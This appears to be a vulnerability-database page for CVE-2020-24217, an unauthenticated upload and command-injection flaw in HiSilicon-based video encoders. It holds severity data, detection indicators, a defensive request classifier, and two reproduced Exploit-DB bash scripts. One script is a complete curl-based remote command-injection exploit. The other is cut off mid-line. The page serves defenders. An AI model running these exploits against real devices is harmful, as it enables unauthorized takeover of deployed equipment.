CVE-2020-24217
Published: 2020-10-06
Priority: P1 · 91 · critical · 9.8 CVSS 3.1
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 38.96% (98.4th percentile)
An issue was discovered in the box application on HiSilicon based IPTV/H.264/H.265 video encoders. The file-upload endpoint does not enforce authentication. Attackers can send an unauthenticated HTTP request to upload a custom firmware component, possibly in conjunction with command injection, to achieve arbitrary code execution.
Detection & IOCs
- Detect unauthenticated HTTP POST requests to the firmware/logo upload endpoint containing the 'upgrade' multipart form field — no authentication headers required by the vulnerable device.
- Detect multipart form-data POST requests where the 'upgrade' field filename contains semicolons, indicating command injection attempt (e.g., filename pattern: logo;<cmd>;.png).
- Detect upload of RAR archive files (magic bytes or Content-Type) to the firmware upgrade endpoint on HiSilicon-based IPTV/H.264/H.265 encoders, as malicious firmware can be delivered as a RAR file.
- Flag HTTP requests to HiSilicon encoder web interfaces that use multipart/form-data with field name 'upgrade' without any session cookie or Authorization header present.
- The exploit targets multiple vendor OEM devices all based on the same HiSilicon chipset; the vulnerable upload endpoint path is not explicitly specified in the sources, requiring fingerprinting of the target device's web interface to confirm the exact endpoint.
- The firmware version is described as vendor-specific; there is no single universal version string to match — detection must rely on behavioral indicators (unauthenticated upload) rather than version matching alone.
- Command injection is embedded inside the filename parameter of the multipart upload, possibly in conjunction with firmware upload; both attack vectors must be monitored independently.
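The indicators listed above, combined into one request classifier that can be run over captured HTTP requests (an added example, not code from any source indexed on this page). The finding names, the `build` helper, the host `encoder.example`, the path `/`, the boundary and the sample requests are constructed assumptions.

```python
import re

RAR_MAGIC = b"Rar!\x1a\x07"  # common prefix of the RAR 4.x and 5.x signatures

def inspect_request(raw):
    """Return the indicators from the list above that one raw HTTP request matches."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    ctype = headers.get("content-type", "")
    boundary = re.search(r'boundary="?([^";]+)', ctype, re.I)
    if (not lines[0].upper().startswith("POST ") or not boundary
            or not ctype.lower().startswith("multipart/form-data")):
        return []
    findings = []
    for part in body.split(b"--" + boundary.group(1).encode("latin-1"))[1:]:
        if part.startswith(b"--"):  # closing delimiter, no more parts
            break
        phead, _, pbody = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        phead = phead.decode("latin-1")
        field = re.search(r'[;\s]name="([^"]*)"', phead, re.I)
        if not field or field.group(1) != "upgrade":
            continue
        if "cookie" not in headers and "authorization" not in headers:
            findings.append("upgrade-upload-without-credentials")
        fname = re.search(r'filename="((?:[^"\\]|\\.)*)"', phead, re.I)
        if fname and ";" in fname.group(1):
            findings.append("semicolon-in-filename")
        if pbody.startswith(RAR_MAGIC) or re.search(
                r"content-type:\s*application/(vnd\.rar|x-rar)", phead, re.I):
            findings.append("rar-payload")
    return findings

def build(field, filename, payload, extra=()):
    """Constructed sample request; host, path "/" and boundary are placeholders."""
    b = "XBOUNDARY"
    body = (f'--{b}\r\nContent-Disposition: form-data; name="{field}"; '
            f'filename="{filename}"\r\nContent-Type: application/octet-stream'
            f'\r\n\r\n').encode() + payload + f"\r\n--{b}--\r\n".encode()
    head = ["POST / HTTP/1.1", "Host: encoder.example",
            f"Content-Type: multipart/form-data; boundary={b}", *extra]
    return "\r\n".join(head).encode() + b"\r\n\r\n" + body

if __name__ == "__main__":
    print(inspect_request(build("upgrade", "logo;<cmd>;.png", b"")))
    print(inspect_request(build("upgrade", "uk.rar", RAR_MAGIC + b"\x00constructed")))
    print(inspect_request(build("avatar", "me.png", b"\x89PNG", ["Cookie: sid=constructed"])))
```

Because the endpoint path is vendor-specific, the classifier keys on the request shape rather than the URL; scope it to traffic destined for known encoder addresses to keep false positives down.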
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vulncheck · 9.8 CRITICAL
GHSA
GHSA-vwf4-cwv7-v664: An issue was discovered in the box application on HiSilicon based IPTV/H
ghsa_unreviewed·2022-05-24
CVE-2020-24217 [CRITICAL] CWE-306 GHSA-vwf4-cwv7-v664: An issue was discovered in the box application on HiSilicon based IPTV/H
VulnCheck
szuray iptv\/h.264_video_encoder_firmware Missing Authentication for Critical Function
vulncheck·2020·CVSS 9.8
CVE-2020-24217 [CRITICAL] szuray iptv\/h.264_video_encoder_firmware Missing Authentication for Critical Function
Affected: szuray iptv\/h.264_video_encoder_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.bleepingcomputer.com/news/security/reverse-shell-botnet-gitpaste-12-spreads-via-github-and-pastebin/#google_vignette
No detection rules found.
Exploit-DB
HiSilicon Video Encoders - RCE via unauthenticated command injection
exploitdb·2020-10-19·CVSS 9.8
CVE-2020-24217 [CRITICAL] HiSilicon Video Encoders - RCE via unauthenticated command injection
---
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated command injection
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
    echo "Usage: $0 [:] "
    exit 1
fi
printf "executing the command... "
if curl -sF "upgrade=;filename=\"logo;$2;.png\"" http://$1 >/dev/null
then
    echo "SUCCESS: remote command executed"
else
    echo "ERROR: $?"
fi
Exploit-DB
HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
exploitdb·2020-10-19·CVSS 9.8
CVE-2020-24217 [CRITICAL] HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
---
#!/usr/bin/env bash
# Exploit Title: HiSilicon video encoders - RCE via unauthenticated upload of malicious firmware
# Date: 2020-09-20
# Exploit Author: Alexei Kojenov
# Vendor Homepage: multiple vendors
# Software Link: N/A
# Version: vendor-specific
# Tested on: Linux
# CVE: CVE-2020-24217
# Vendors: URayTech, J-Tech Digital, ProVideoInstruments
# Reference: https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
# Reference: https://www.kb.cert.org/vuls/id/896979
if [ "$#" -ne 2 ]
then
    echo "Usage: $0 [:] "
    exit 1
fi
printf "creating uk.rar... "
echo "$2" > uk.txt
rar a -ma4 uk.rar uk.txt >/dev/null 2>&1 || { echo "ERROR: rar failed. Is it installed?"; exit 2; }
echo "done"
rm uk.txt
pr
No writeups or analysis indexed.
References:
- http://packetstormsecurity.com/files/159597/HiSilicon-Video-Encoder-Command-Injection.html
- http://packetstormsecurity.com/files/159599/HiSilicon-Video-Encoder-Malicious-Firmware-Code-Execution.html
- https://kojenov.com/2020-09-15-hisilicon-encoder-vulnerabilities/
- https://www.kb.cert.org/vuls/id/896979
2020-10-06: Published
Exploited in the wild